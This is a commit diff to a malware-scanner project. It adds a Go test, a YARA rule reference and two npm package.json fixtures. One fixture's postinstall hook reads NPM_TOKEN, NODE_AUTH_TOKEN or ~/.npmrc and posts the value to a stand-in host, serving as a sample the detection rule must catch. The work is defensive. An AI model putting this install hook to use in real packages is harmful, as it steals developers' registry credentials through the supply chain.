Add npm credential exfiltration test fixture

Signed-off-by: Nikhil <tad.areas_0y@icloud.com>

Author: Big-Comfy

pkg/action/scan_test.go

@@ -165,6 +165,69 @@ func TestScanRepeatedScansNoResourceExhaustion(t *testing.T) {
 	}
 }
 
+func TestNPMCredentialExfiltrationRule(t *testing.T) {
+	ctx := context.Background()
+
+	rfs := []fs.FS{rules.FS, thirdparty.FS}
+	yrs, err := CachedRules(ctx, rfs)
+	if err != nil {
+		t.Fatalf("rules: %v", err)
+	}
+
+	cfg := malcontent.Config{
+		Concurrency:      runtime.NumCPU(),
+		IgnoreSelf:       false,
+		IncludeDataFiles: false,
+		MinFileRisk:      0,
+		MinRisk:          0,
+		Rules:            yrs,
+		RuleFS:           rfs,
+	}
+
+	tests := []struct {
+		name     string
+		path     string
+		wantRule bool
+	}{
+		{
+			name:     "postinstall credential exfiltration",
+			path:     filepath.Join("testdata", "npm-token-exfil", "package.json"),
+			wantRule: true,
+		},
+		{
+			name:     "release script token reference",
+			path:     filepath.Join("testdata", "npm-token-release", "package.json"),
+			wantRule: false,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			fr, err := scanSinglePath(ctx, cfg, tt.path, rfs, tt.path, "", nil)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+
+			gotRule := hasRuleName(fr, "npm_install_credential_exfiltration")
+			if gotRule != tt.wantRule {
+				t.Fatalf("npm_install_credential_exfiltration match = %t, want %t", gotRule, tt.wantRule)
+			}
+		})
+	}
+}
+
+func hasRuleName(fr *malcontent.FileReport, ruleName string) bool {
+	if fr == nil {
+		return false
+	}
+	for _, b := range fr.Behaviors {
+		if b.RuleName == ruleName {
+			return true
+		}
+	}
+	return false
+}
+
 func TestExitIfHitOrMiss(t *testing.T) {
 	t.Parallel()
 

pkg/action/testdata/npm-token-exfil/package.json

@@ -0,0 +1,8 @@
+{
+  "name": "npm-token-exfil-test",
+  "version": "1.0.0",
+  "description": "test fixture",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs');const token=process.env.NPM_TOKEN||process.env.NODE_AUTH_TOKEN||fs.readFileSync(process.env.HOME+'/.npmrc','utf8');fetch('https://example.invalid/collect',{method:'POST',body:token})\""
+  }
+}

pkg/action/testdata/npm-token-release/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "npm-token-release-test",
+  "version": "1.0.0",
+  "description": "test fixture",
+  "homepage": "https://example.com/package",
+  "scripts": {
+    "release": "NPM_TOKEN=$NPM_TOKEN node ./scripts/release.js"
+  }
+}

rules/exfil/npm.yara

@@ -78,6 +78,7 @@ rule npm_recon_commands: high {
 rule npm_install_credential_exfiltration: high {
   meta:
     description = "npm installer references package-manager credentials and sends data over HTTP"
+    reference   = "https://unit42.paloaltonetworks.com/npm-supply-chain-attack/"
 
   strings:
     $install_pre = /"(preinstall|install|postinstall|prepare)":/